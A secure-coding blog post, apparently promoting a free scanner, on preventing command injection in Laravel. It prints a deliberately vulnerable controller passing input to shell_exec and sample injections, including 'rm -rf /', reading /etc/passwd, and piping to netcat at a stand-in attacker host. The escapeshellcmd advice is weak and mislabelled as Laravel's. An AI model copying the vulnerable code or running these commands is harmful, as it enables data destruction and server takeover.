Prevent Command Injection in Laravel: Security Best Practices

Command Injection in Laravel: A Developer’s Security Guide

Command Injection is a critical web vulnerability that can allow attackers to execute arbitrary system commands on a Laravel-based application. If not properly mitigated, this flaw can compromise sensitive data, escalate privileges, or even take full control of the server.

In this blog, we’ll explore how Command Injection works, provide Laravel-specific coding examples, and discuss prevention techniques. We’ll also demonstrate how to assess your website security using our free Website Security Scanner.

What is Command Injection?

Command Injection occurs when an application improperly processes user inputs that are later executed as system commands. In Laravel, this typically happens when shell commands are executed using functions like:

• exec()

• shell_exec()

• system()

• popen()

• proc_open()

An attacker can exploit this by injecting malicious commands into input fields or HTTP request parameters.

Example of a Vulnerable Laravel Code

<?php

namespace App\Http\Controllers;

use Illuminate\Http\Request;

class VulnerableController extends Controller

{

    public function executeCommand(Request $request)

    {

        $command = $request->input('cmd'); // Taking input directly

        $output = shell_exec($command); // Unsafe execution

        return response()->json(['output' => $output]);

    }

}

📌 Why is this dangerous?
If a user sends a request like:
http://yourwebsite.com/execute?cmd=ls
It will list all files in the directory.

Worse, an attacker could execute:
http://yourwebsite.com/execute?cmd=rm -rf /
This would delete all files on the server!

Real-World Exploit: How Attackers Use Command Injection

A common attack scenario involves appending system commands using &&, ;, or | operators:

• ping example.com && whoami

• cat /etc/passwd; ls -la

• echo hacked | nc attacker.com 4444

These commands can leak system information, exfiltrate files, or establish remote access to your server.

How to Prevent Command Injection in Laravel?

✅ 1. Use Laravel’s Built-in Functions

Instead of shell_exec(), use Laravel’s Process Component, which automatically escapes arguments:

use Symfony\Component\Process\Process;

use Symfony\Component\Process\Exception\ProcessFailedException;

$process = new Process(['ls', '-la']); 

$process->run();

if (!$process->isSuccessful()) {

    throw new ProcessFailedException($process);

}

echo $process->getOutput();

✅ 2. Validate and Sanitize User Input

Ensure that only expected commands are allowed:

$allowedCommands = ['ls', 'whoami', 'date'];

$userCommand = $request->input('cmd');

if (!in_array($userCommand, $allowedCommands)) {

    return response()->json(['error' => 'Unauthorized command'], 403);

}

$process = new Process([$userCommand]);

$process->run();

return response()->json(['output' => $process->getOutput()]);

✅ 3. Disable Dangerous PHP Functions

Modify php.ini to disable risky functions:

disable_functions = exec, shell_exec, system, passthru, popen, proc_open

✅ 4. Use Laravel’s Escape Function

$command = escapeshellcmd($userInput);

$output = shell_exec($command);

This prevents special characters from being executed as part of a command.

Testing for Command Injection with Our Free Tool

To ensure your Laravel application is safe from Command Injection, use our free tool for a quick Website Security test. It scans websites for vulnerabilities, including command injection risks.

Screenshot of the free tools webpage where you can access security assessment tools.